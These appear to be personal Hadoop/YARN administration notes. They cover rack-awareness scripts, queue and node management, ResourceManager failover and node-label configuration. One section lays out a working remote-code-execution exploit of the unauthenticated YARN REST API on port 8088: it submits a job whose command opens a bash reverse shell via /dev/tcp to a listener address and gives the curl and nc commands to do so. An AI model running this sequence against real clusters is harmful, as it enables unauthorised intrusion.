Contents
  1. Rack Awareness
  2. Port 8088 Mining Vulnerability
  3. Moving an Application to Another Queue
  4. Viewing Logs
  5. Decommissioning a Queue
  6. Node Commissioning and Decommissioning
    1. Commissioning a Node
    2. Decommissioning a Node
      1. YARN
  7. Active/Standby Failover
  8. node-label
    1. Enabling and Configuration
    2. Operation Commands

Rack Awareness

  • Configure the parameters: in core-site.xml, set net.topology.node.switch.mapping.impl to org.apache.hadoop.net.ScriptBasedMapping, and point net.topology.script.file.name at the script that resolves the rack topology.

  • Write the script: the script maps each IP to its rack information, for example:
    Static mapping

#!/usr/bin/python3
import sys

# static IP -> rack table
rack = {
    "192.168.0.1": "/room1-rack1",
    "192.168.0.2": "/room1-rack1",
    "192.168.0.3": "/room1-rack2",
}

# Hadoop passes datanode IPs as arguments; print one rack per IP
for ip in sys.argv[1:]:
    print(rack.get(ip, "/default-rack"))

Partition by subnet, v1

#!/usr/bin/python3
# this script makes assumptions about the physical environment.
# 1) each rack is its own layer 3 network with a /24 subnet, which
#    could be typical where each rack has its own
#    switch with uplinks to a central core router.
#
#             +-----------+
#             |core router|
#             +-----------+
#            /             \
# +-----------+           +-----------+
# |rack switch|           |rack switch|
# +-----------+           +-----------+
# | data node |           | data node |
# +-----------+           +-----------+
# | data node |           | data node |
# +-----------+           +-----------+
#
# 2) topology script gets list of IP's as input, calculates network address, and prints '/network_address/ip'.

import sys
import netaddr

sys.argv.pop(0)  # discard the script name from argv; the rest are IP addresses

netmask = '255.255.255.0'  # set to the netmask used in your environment; this example assumes /24

for ip in sys.argv:  # loop over the list of datanode IPs
    address = '{0}/{1}'.format(ip, netmask)  # format as 'ip/netmask' so netaddr can parse it
    try:
        network_address = netaddr.IPNetwork(address).network  # calculate the network address
        print("/{0}".format(network_address))
    except:
        print("/rack-unknown")  # catch-all value if the network address cannot be calculated

Partition by subnet, v2 (splitting the IP string)

#!/usr/bin/env python
# -*- coding: utf-8 -*-

import sys

sys.argv.pop(0)
for ip in sys.argv:
    try:
        rack = "/rack-" + "_".join(ip.split(".")[:3])  # use the first three octets of the IP as the rack id
        print(rack)
    except:
        print("/rack-unknown")

Given a node IP, the script prints the corresponding rack information.
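The v2 splitting rule is easy to sanity-check outside the cluster; here it is wrapped in a function (my naming, for illustration) so a few IPs can be verified directly:

```python
def rack_of(ip):
    """Mirror of the v2 script: the first three octets become the rack id."""
    try:
        return "/rack-" + "_".join(ip.split(".")[:3])
    except Exception:
        return "/rack-unknown"

print(rack_of("10.17.41.133"))  # -> /rack-10_17_41
print(rack_of("10.17.41.7"))    # -> /rack-10_17_41 (same /24, same rack)
```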
  • Restart services: after the configuration is in place, restart HDFS and YARN for rack awareness to take effect.
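Putting the first step together, the core-site.xml fragment might look like the following; the script path is a placeholder for wherever the topology script is actually installed:

```xml
<property>
  <name>net.topology.node.switch.mapping.impl</name>
  <value>org.apache.hadoop.net.ScriptBasedMapping</value>
</property>
<property>
  <!-- placeholder path: point at your topology script -->
  <name>net.topology.script.file.name</name>
  <value>/etc/hadoop/conf/topology.py</value>
</property>
```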

Port 8088 Mining Vulnerability

Request a new application ID
curl -X POST http://10.33.21.190:8088/ws/v1/cluster/apps/new-application

Create the job description file 1.json with a reverse shell
{
  "application-id": "application_1639358619460_0019",
  "application-name": "get-shell",
  "am-container-spec": {
    "commands": {
      "command": "/bin/bash -i >& /dev/tcp/10.17.41.129/8888 0>&1"
    }
  },
  "application-type": "YARN"
}

Start the listener
nc -lvvp 8888

Submit the job
curl -s -i -X POST -H 'Accept: application/json' -H 'Content-Type: application/json' http://10.33.21.190:8088/ws/v1/cluster/apps --data-binary @1.json

Moving an Application to Another Queue

yarn application -movetoqueue application_1667986310829_98856 -queue spark

Viewing Logs

Yarn:
http://xx:8088/cluster?user.name=yarn
http://xx:8088/proxy/application_1660270769302_1399007
hdfs dfs -ls /spark2-history/ |grep application_1660270769302_1399007
hdfs dfs -ls /app-logs/xx/logs/application_1660270769302_3305625 |head

yarn logs -appOwner xx -applicationId application_1660270769302_3305625 -out t1
find t1 -name "*01_000001*"

Decommissioning a Queue

Set yarn.scheduler.capacity.<queue-path>.state=STOPPED:
new applications cannot be submitted to the queue or to any of its child queues;
existing applications continue to completion, so the queue can be drained gracefully.
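For a concrete queue, say root.spark, the property in capacity-scheduler.xml would look like the snippet below; the change takes effect after running yarn rmadmin -refreshQueues (the queue name here is illustrative):

```xml
<property>
  <name>yarn.scheduler.capacity.root.spark.state</name>
  <value>STOPPED</value>
</property>
```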

Node Commissioning and Decommissioning

Commissioning a Node

Add the new node to hadoop/etc/hadoop/dfs.include, then refresh:
hdfs dfsadmin -refreshNodes
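The include file only takes effect if hdfs-site.xml points the NameNode at it via dfs.hosts; a sketch, with the absolute path prefix as a placeholder to be adjusted to your install:

```xml
<property>
  <name>dfs.hosts</name>
  <value>/path/to/hadoop/etc/hadoop/dfs.include</value>
</property>
```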

Decommissioning a Node

YARN

echo "10.17.41.133" > nodemanager.excludes

vi yarn-site.xml

<property>
  <name>yarn.resourcemanager.nodes.exclude-path</name>
  <value>/data/hadoop-2.8.3/etc/hadoop/nodemanager.excludes</value>
</property>

yarn rmadmin -refreshNodes -g [timeout in seconds] -client|server

The NodeManager process on the node exits automatically once decommissioning completes.

Active/Standby Failover

Failover does not affect jobs submitted in cluster mode, but it does affect jobs in client mode.

yarn rmadmin -getAllServiceState
yarn rmadmin -transitionToStandby --forcemanual rm2
yarn rmadmin -transitionToActive --forcemanual rm1
$HADOOP_HOME/sbin/yarn-daemon.sh stop resourcemanager
$HADOOP_HOME/sbin/yarn-daemon.sh start resourcemanager
yarn rmadmin -getAllServiceState
yarn rmadmin -transitionToStandby --forcemanual rm1
yarn rmadmin -transitionToActive --forcemanual rm2
yarn rmadmin -getAllServiceState

node-label

  • A node has exactly one label; unlabeled nodes belong to the DEFAULT partition.
  • Queues are configured with the share of a label's resources they may use; one label can serve multiple queues with different shares.
  • Only the Capacity Scheduler supports Node Labels partition scheduling.
  • Labels are either exclusive or non-exclusive:
    • exclusive (the default): the labeled resources belong only to that label
    • non-exclusive: the label's idle resources are also shared with the DEFAULT partition

Enabling and Configuration

yarn-site.xml

yarn.node-labels.fs-store.root-dir | hdfs:///yarn/node-labels/
yarn.node-labels.enabled | true
yarn.node-labels.configuration-type | "centralized", "delegated-centralized" or "distributed"; default is "centralized"

yarn.resourcemanager.scheduler.class | org.apache.hadoop.yarn.server.resourcemanager.scheduler.capacity.CapacityScheduler

capacity-scheduler.xml

<configuration>
  <property>
    <!-- list of queues -->
    <name>yarn.scheduler.capacity.root.queues</name>
    <value>default,Queue1</value>
  </property>
  <property>
    <name>yarn.scheduler.capacity.root.default.capacity</name>
    <value>100</value>
  </property>
  <property>
    <name>yarn.scheduler.capacity.root.Queue1.capacity</name>
    <value>0</value>
  </property>
  <property>
    <name>yarn.scheduler.capacity.root.Queue1.maximum-applications</name>
    <value>20</value>
  </property>
  <property>
    <!-- accessible partitions: comma-separated list of labels; required -->
    <name>yarn.scheduler.capacity.root.Queue1.accessible-node-labels</name>
    <value>DEMO</value>
  </property>
  <property>
    <!-- default partition for container requests submitted to this queue; optional, defaults to the DEFAULT partition "" -->
    <name>yarn.scheduler.capacity.root.Queue1.default-node-label-expression</name>
    <value>DEMO</value>
  </property>
  <property>
    <!-- queue capacity in the DEMO partition; required, defaults to 0 -->
    <name>yarn.scheduler.capacity.root.Queue1.accessible-node-labels.DEMO.capacity</name>
    <value>100</value>
  </property>
  <property>
    <!-- queue maximum capacity in the DEMO partition; optional, defaults to 100 -->
    <name>yarn.scheduler.capacity.root.Queue1.accessible-node-labels.DEMO.maximum-capacity</name>
    <value>100</value>
  </property>
</configuration>

yarn rmadmin -refreshQueues

Operation Commands

yarn rmadmin -addToClusterNodeLabels "label_1(exclusive=true/false),label_2(exclusive=true/false)"  # labels are exclusive by default

yarn cluster --list-node-labels

**Centralized**
Nodes must be identified by hostname, as shown on the YARN web UI
yarn rmadmin -replaceLabelsOnNode "hostname[:port]=label1 hostname=label2"

yarn node -status <NodeId>

## Example
yarn rmadmin -addToClusterNodeLabels "ck"
yarn rmadmin -replaceLabelsOnNode "a51-dg-hcy-bi-save-001=ck"